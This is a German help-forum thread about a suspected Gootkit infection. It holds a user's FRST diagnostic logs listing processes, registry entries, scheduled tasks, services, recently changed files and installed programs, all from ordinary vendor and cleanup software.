vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Das sieht doch schonmal besser aus!

Jetzt bitte neue FRST-Logs.

Alt 14.01.2021, 01:17   #11
Andy4Peter
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021
durchgeführt von Peter (Administrator) auf ESPRIMO (FUJITSU ESPRIMO P910) (14-01-2021 01:11:09)
Gestartet von C:\Users\Peter\Desktop
Geladene Profile: Peter
Platform: Windows 10 Pro Version 2004 19041.685 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(MAGIX AG) [Datei ist nicht signiert] C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(MAGIX Software GmbH -> MAGIX) C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\Peter\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\EPSON Software\Download Navigator\EPSDNMON.EXE
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\EPSON Software\Epson Printer Connection Checker\EPPCCMON.EXE
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\epson\MyEpson Portal\mep.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\epson\MyEpson Portal\mepService.exe
(SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIRGE.EXE

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-07-19] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EPPCCMON] => C:\Program Files (x86)\EPSON Software\Epson Printer Connection Checker\EPPCCMON.EXE [442936 2020-10-22] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKLM-x32\...\Run: [TrayServer] => C:\Program Files (x86)\MAGIX\Video_deluxe_MX_Plus\TrayServer_de.exe [90112 2008-08-07] (MAGIX AG) [Datei ist nicht signiert]
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1087184 2016-01-20] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [QMxNetworkSync] => C:\Program Files\Common Files\MAGIX Services\QMxNetworkSync\QMxNetworkSync.exe [851704 2018-11-13] (MAGIX Software GmbH -> MAGIX)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YATIRGE.EXE [417776 2014-11-14] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\...\Run: [EPSDNMON] => C:\Program Files (x86)\Epson Software\Download Navigator\EPSDNMON.EXE [346712 2020-07-27] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\EPSON XP-900 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBRGE.DLL [182784 2015-12-09] (Microsoft Windows Hardware Compatibility Publisher -> SEIKO EPSON CORPORATION)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {089E1D84-AEE0-488C-88A7-D6CE087096DD} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-06] (Mozilla Corporation -> Mozilla Foundation)
Task: {1AC2B76D-154F-426F-BB05-D603135A0EBE} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {202BF09C-1BD8-4167-8066-25DA191AA479} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2E8498E4-689C-4F83-B839-9833BFFAE19E} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [696016 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {72ABF53D-DE0C-4F2B-8B8F-1B16D29DCEDB} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {7CC7F993-3346-4FD8-A972-13FACE1F2619} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855760 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {814181A9-9584-41EF-8CA3-2AF505F4759C} - System32\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001 => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupload.exe [31320 2020-12-20] (LogMeIn, Inc. -> LogMeIn, Inc.)
Task: {946656EB-B6E2-4550-8811-989045BA23B8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [570240 2017-02-14] (Apple Inc. -> Apple Inc.)
Task: {9A85E7E9-04B7-460B-B949-081BBF76EF44} - System32\Tasks\EPSON XP-900 Series Update {F9A32729-647E-4849-9E12-C9EB3BAD9726} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSRGE.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {CB69C3AD-49EC-42FF-9D2B-90B0C3AF74F1} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855760 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E84AA775-BBCA-46C9-A901-286E75FF8DA3} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950480 2018-11-13] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F4362CDF-E227-43AB-9675-F299571D3DB3} - System32\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001 => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupdate.exe [31320 2020-12-20] (LogMeIn, Inc. -> LogMeIn, Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\EPSON XP-900 Series Update {F9A32729-647E-4849-9E12-C9EB3BAD9726}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSRGE.EXE:/EXE:{F9A32729-647E-4849-9E12-C9EB3BAD9726} /F:UpdateWORKGROUP\ESPRIMO$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001.job => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupdate.exe
Task: C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001.job => C:\Users\Peter\AppData\Local\GoToMeeting\19228\g2mupload.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 80.69.96.12 81.210.129.4
Tcpip\..\Interfaces\{b0472145-145f-4c3d-98b1-09bcd94a9b64}: [DhcpNameServer] 80.69.96.12 81.210.129.4

Edge: 
======
Edge Profile: C:\Users\Peter\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-08]

FireFox:
========
FF DefaultProfile: q8p7ea2o.default
FF ProfilePath: C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default [2021-01-14]
FF Homepage: Mozilla\Firefox\Profiles\q8p7ea2o.default -> hxxps:\\\\www.ecosia.org/
FF Notifications: Mozilla\Firefox\Profiles\q8p7ea2o.default -> hxxps://www.epson.de
FF NewTabOverride: Mozilla\Firefox\Profiles\q8p7ea2o.default -> Disabled: web@Converter
FF Extension: (Ecosia – Die Suchmaschine, die Bäume pflanzt) - C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default\Extensions\{d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}.xpi [2019-01-02]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-04-29] (Apple Inc. -> Apple Inc.)
S3 ElfoService; C:\Program Files (x86)\ElsterFormular Update Service\bin\elfoService.exe [1284360 2018-03-31] (Bayerisches Landesamt fuer Steuern -> )
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [145224 2016-11-08] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1858048 2012-01-23] (MAGIX AG) [Datei ist nicht signiert]
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [2702848 2011-04-26] (MAGIX®) [Datei ist nicht signiert]
R2 MyEpson Portal Service; C:\Program Files (x86)\EPSON\MyEpson Portal\mepService.exe [714712 2017-06-28] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
S2 PCLEPCI; C:\Windows\SysWOW64\drivers\pclepci.sys [14165 2005-02-09] (Pinnacle Systems GmbH) [Datei ist nicht signiert]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-11] (Microsoft Windows Publisher -> Microsoft Corporation)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [3004048 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103384 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 InCDsrv; C:\Program Files (x86)\Ahead\InCD\InCDsrv.exe [X]
S2 InCDsrvR; C:\Program Files (x86)\Ahead\InCD\InCDsrv.exe -r [X]
S2 McAfee WebAdvisor; "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 61883; C:\WINDOWS\System32\drivers\61883.sys [70144 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 FscEfDmi; C:\WINDOWS\System32\drivers\FscEfDmi.sys [25856 2014-04-16] (Fujitsu Technology Solutions GmbH -> Fujitsu Technology Solutions)
S3 FscGabi; C:\WINDOWS\System32\drivers\FscGabi.sys [29952 2014-04-16] (Fujitsu Technology Solutions GmbH -> Fujitsu Technology Solutions)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2021-01-04] (SurfRight B.V. -> )
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [46688 2019-12-07] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [350136 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [54200 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-14 00:28 - 2021-01-14 00:40 - 000003304 ____C C:\Users\Peter\Desktop\Fixlog.txt
2021-01-14 00:17 - 2021-01-14 00:17 - 000048197 ____C C:\Users\Peter\Desktop\Addition.txt
2021-01-14 00:15 - 2021-01-14 01:11 - 000013341 ____C C:\Users\Peter\Desktop\FRST.txt
2021-01-13 23:23 - 2021-01-13 23:14 - 008458096 ____C (Malwarebytes) C:\Users\Peter\Desktop\adwcleaner_8.0.9.exe
2021-01-13 23:15 - 2021-01-13 23:18 - 000000000 ___DC C:\AdwCleaner
2021-01-13 20:41 - 2021-01-14 01:11 - 000000000 ___DC C:\FRST
2021-01-13 20:33 - 2021-01-13 21:59 - 002281472 ____C (Farbar) C:\Users\Peter\Desktop\FRST64.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001769688 _____ C:\WINDOWS\system32\vulkaninfo-1-999-0-0-0.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001769688 _____ C:\WINDOWS\system32\vulkaninfo.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001370328 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001370328 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2021-01-07 11:18 - 2020-10-05 14:05 - 001054944 _____ C:\WINDOWS\system32\vulkan-1-999-0-0-0.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 001054944 _____ C:\WINDOWS\system32\vulkan-1.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000917728 _____ C:\WINDOWS\SysWOW64\vulkan-1-999-0-0-0.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000917728 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000455408 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2021-01-07 11:18 - 2020-10-05 14:05 - 000351128 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 001507224 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 001161112 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000816368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000673520 _____ C:\WINDOWS\system32\nvofapi64.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000670616 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000555248 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000543128 _____ C:\WINDOWS\SysWOW64\nvofapi.dll
2021-01-07 11:18 - 2020-10-05 14:03 - 000047424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvhdap64.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 007707544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 006860184 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 004174064 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 002508528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 002098072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001731824 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6445671.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001585560 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2021-01-07 11:18 - 2020-10-05 14:02 - 001482992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6445671.dll
2021-01-07 11:18 - 2020-10-05 14:00 - 005972824 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2021-01-06 17:39 - 2021-01-06 17:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-06 16:48 - 2021-01-08 08:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-04 15:59 - 2021-01-04 15:59 - 000055232 _____ C:\WINDOWS\system32\Drivers\hitmanpro37.sys
2021-01-04 15:57 - 2021-01-04 15:57 - 000016810 _____ C:\WINDOWS\system32\.crusader
2021-01-04 15:44 - 2021-01-12 15:22 - 000000000 ____D C:\WINDOWS\CryptoGuard
2021-01-04 15:44 - 2021-01-12 15:20 - 000000000 ____D C:\ProgramData\HitmanPro.Alert
2021-01-04 15:41 - 2021-01-12 15:23 - 000000000 ____D C:\ProgramData\Sophos
2021-01-04 15:40 - 2021-01-04 15:40 - 307274360 _____ (Sophos Limited) C:\Users\Peter\Downloads\SophosInstall.exe
2020-12-17 10:06 - 2020-12-17 10:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-14 00:58 - 2020-08-02 10:34 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-14 00:58 - 2019-12-07 15:51 - 000743650 _____ C:\WINDOWS\system32\perfh007.dat
2021-01-14 00:58 - 2019-12-07 15:51 - 000150072 _____ C:\WINDOWS\system32\perfc007.dat
2021-01-14 00:58 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-14 00:54 - 2020-08-02 10:34 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-14 00:54 - 2020-08-02 10:26 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-14 00:54 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-14 00:54 - 2018-11-24 12:22 - 000000000 ____D C:\ProgramData\NVIDIA
2021-01-14 00:53 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-14 00:06 - 2017-04-02 14:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MAGIX
2021-01-14 00:06 - 2017-04-02 14:30 - 000000000 ____D C:\Program Files (x86)\MAGIX
2021-01-13 23:54 - 2017-04-02 11:56 - 000000000 ___DC C:\Users\Peter\AppData\LocalLow\Mozilla
2021-01-13 23:30 - 2020-08-02 10:28 - 000888552 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-13 23:04 - 2020-08-02 10:28 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-13 22:53 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 22:18 - 2017-04-02 14:16 - 000000000 ____D C:\ProgramData\McAfee
2021-01-13 22:11 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-13 22:11 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-13 22:05 - 2018-03-19 14:48 - 000000000 ___DC C:\Users\Peter\AppData\Local\Packages
2021-01-13 22:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2021-01-13 22:04 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Macromed
2021-01-13 22:03 - 2017-12-01 10:41 - 000000000 ___DC C:\Users\Peter\AppData\Local\QMxNetworkSync
2021-01-12 14:54 - 2020-08-02 10:28 - 000000000 ____D C:\Users\Peter
2021-01-09 09:16 - 2020-08-04 15:39 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-09 09:16 - 2020-08-04 15:39 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-01-09 09:16 - 2020-08-04 15:39 - 000002281 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2021-01-08 08:56 - 2020-12-11 10:37 - 000094208 _____ C:\Users\Peter\AppData\Roaming\cookies.sqlite
2021-01-08 08:54 - 2017-03-31 21:22 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-07 11:20 - 2018-11-24 12:21 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2021-01-07 11:19 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Help
2021-01-07 11:19 - 2018-11-24 12:21 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2021-01-06 17:39 - 2017-04-02 11:42 - 000001012 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-04 10:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp
2021-01-04 10:41 - 2017-12-01 10:37 - 000000000 ____D C:\ProgramData\tmp
2020-12-30 10:35 - 2018-05-17 11:33 - 000000000 ___DC C:\Users\Peter\AppData\Local\PlaceholderTileLogoFolder
2020-12-26 15:54 - 2017-09-03 11:42 - 000011483 ____C C:\Users\Peter\Documents\Etiketten 2.odt
2020-12-22 10:53 - 2020-03-04 19:02 - 000000650 _____ C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001.job
2020-12-22 10:53 - 2020-03-04 19:02 - 000000554 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001.job
2020-12-20 17:40 - 2020-08-02 10:34 - 000003802 _____ C:\WINDOWS\system32\Tasks\G2MUploadTask-S-1-5-21-716491260-3257532223-3478221735-1001
2020-12-20 17:40 - 2020-08-02 10:34 - 000003706 _____ C:\WINDOWS\system32\Tasks\G2MUpdateTask-S-1-5-21-716491260-3257532223-3478221735-1001
2020-12-20 17:40 - 2020-03-04 19:02 - 000000000 ____D C:\Users\Peter\AppData\Local\GoToMeeting
2020-12-17 10:43 - 2017-03-31 21:22 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2020-12-11 10:37 - 2021-01-08 08:56 - 000094208 _____ () C:\Users\Peter\AppData\Roaming\cookies.sqlite
2018-07-18 11:17 - 2018-07-18 11:17 - 000006144 ____C () C:\Users\Peter\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-05-15 18:39 - 2017-05-15 18:39 - 000007619 ____C () C:\Users\Peter\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von Peter (14-01-2021 01:12:38)
Gestartet von C:\Users\Peter\Desktop
Windows 10 Pro Version 2004 19041.685 (X64) (2020-08-02 09:35:06)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-716491260-3257532223-3478221735-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-716491260-3257532223-3478221735-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-716491260-3257532223-3478221735-1000 - Limited - Disabled) => C:\Users\defaultuser0
Gast (S-1-5-21-716491260-3257532223-3478221735-501 - Limited - Disabled)
Peter (S-1-5-21-716491260-3257532223-3478221735-1001 - Administrator - Enabled) => C:\Users\Peter
WDAGUtilityAccount (S-1-5-21-716491260-3257532223-3478221735-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee VirusScan (Enabled - Up to date) {4DE344F8-6897-65B4-CED0-82B3AF2591B4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

AeroFly Professional Deluxe (inkl. Add-On 1) (HKLM-x32\...\{8B3E5A90-1F6E-4FAF-B84F-C306C8A80809}) (Version: 1.9.0103 - IPACS)
AeroFly Professional Deluxe AddOn 3 (True Scale AddOn) (HKLM-x32\...\{4F5EBA69-57B4-484D-B60D-DD95981031A0}) (Version: 1.11.0705 - IPACS)
AeroFly Professional Deluxe AddOn 4 (Team Edition 1) (HKLM-x32\...\{780FAA54-2FA0-4CF4-A9C8-AE50C8B469C9}) (Version: 1.11.0707 - IPACS)
Apple Application Support (32-Bit) (HKLM-x32\...\{5C028510-A6A1-409A-A2BF-4DCB43B21EF9}) (Version: 7.6 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{5C7D4FCF-80C5-4520-9934-D50532AAC59C}) (Version: 7.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{B5A46811-3612-4DA5-8A5A-E6DED5D7C523}) (Version: 12.2.1.12 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{52D87F32-70E4-4348-8148-C0B9F35B1314}) (Version: 2.3.0.177 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Catalyst Control Center Next Localization BR (HKLM\...\{3E245378-BF77-6946-C6F6-096DBE5EAB82}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
